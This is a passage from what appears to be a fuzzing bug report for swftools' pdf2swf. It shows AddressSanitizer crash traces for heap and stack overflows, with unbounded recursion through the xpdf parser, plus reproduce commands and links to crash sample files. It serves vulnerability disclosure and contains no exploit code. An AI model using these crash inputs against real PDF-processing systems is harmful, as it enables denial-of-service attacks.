draw_stroke Shadow bytes around the buggy address: 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0e7fff8090: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0e7fff80b0: fd fd fd fd fd fd fa fa fa fa fd fd fd fd fd fd 0x0c0e7fff80c0: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c0e7fff80d0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==11942==ABORTING ``` ----------------------------------- # Stack buffer overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id407_stack_overflow_getcurrentthread.zip](https://github.com/matthiaskramm/swftools/files/9036121/id407_stack_overflow_getcurrentthread.zip) ### crash info ``` ==4742==ERROR: AddressSanitizer: stack-overflow on address 0x7ffff930cff8 (pc 0x0000004e43a9 bp 0x000000eeb720 sp 0x7ffff930cfd0 T0) #0 0x4e43a9 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 #1 0x4e43a9 in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepotbase.h:104 #2 0x4e43a9 in __sanitizer::StackDepotPut(__sanitizer::StackTrace) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:98 #3 0x428654 in __asan::Allocator::Allocate(unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType, bool) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:573 #4 0x4295e6 in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:980 #5 0x4b3133 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:146 #6 0x607dd8 in gmalloc(int, bool) /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:101:13 #7 0x607dd8 in gmalloc /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:116:12 #8 0x607dd8 in copyString /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:301:16 #9 0x664133 in Object::initCmd(char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:103:30 #10 0x664133 in Lexer::getObj(Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Lexer.cc:357:10 #11 0x65d52b in Parser::shift() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:226:12 #12 0x65d52b in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:108:5 #13 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #14 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #15 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #16 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #17 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #18 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #19 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #20 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #21 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #22 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #23 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #24 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #25 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #26 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #27 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #28 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #29 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #30 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #31 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #32 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #33 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #34 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #35 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 //...omission #286 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #287 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #288 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #289 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #290 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 SUMMARY: AddressSanitizer: stack-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) ==4742==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id465_stack_overflow_buffered_vfprintf.zip](https://github.com/matthiaskramm/swftools/files/9036128/id465_stack_overflow_buffered_vfprintf.zip) ### crash info ``` ==27980==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe5cfafef8 (pc 0x7f211a7bd396 bp 0x7ffe5cfb03b0 sp 0x7ffe5cfafe40 T0) #0 0x7f211a7bd396 in vfprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:1275 #1 0x7f211a7c063f in buffered_vfprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:2329 #2 0x7f211a7bd6f5 in vfprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:1301 #3 0x451e56 in vfprintf /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1647 #4 0x451f66 in fprintf /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1704 #5 0x60abb7 in error(int, char*, ...) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Error.cc:29:5 #6 0x65c6e9 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:76:2 #7 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #8 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #9 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #10 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #11 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #12 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #13 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #14 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #15 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #16 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #17 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #18 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #19 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #20 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #21 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #22 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #23 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #24 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #25 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #26 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #27 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #28 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #29 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #30 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #31 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #32 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #33 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #34 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #35 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #36 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #37 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #38 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #39 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #40 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #41 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #42 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #43 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #44 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #45 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #46 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #47 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #48 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #49 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #50 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #51 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #52 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #53 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #54 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #55 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #56 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #57 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #58 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #59 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #60 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #61 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #62 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #63 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #64 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #65 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #66 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #67 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #68 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #69 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #70 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #71 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #72 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #73 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #74 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #75 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #76 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #77 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #78 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #79 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #80 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #81 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #82 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #83 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #84 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #85 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #86 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #87 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #88 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #89 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #90 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #91 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #92 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #93 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #94 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #95 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #96 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #97 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #98 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #99 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #100 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #101 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #102 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #103 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #104 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #105 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #106 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #107 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #108 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #109 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #110 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #111 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #112 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #113 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #114 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #115 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #116 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #117 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #118 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #119 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #120 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #121 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #122 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #123 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #124 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #125 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #126 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #127 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #128 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #129 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #130 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #131 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #132 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #133 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #134 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #135 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #136 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #137 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #138 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #139 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #140 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #141 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) 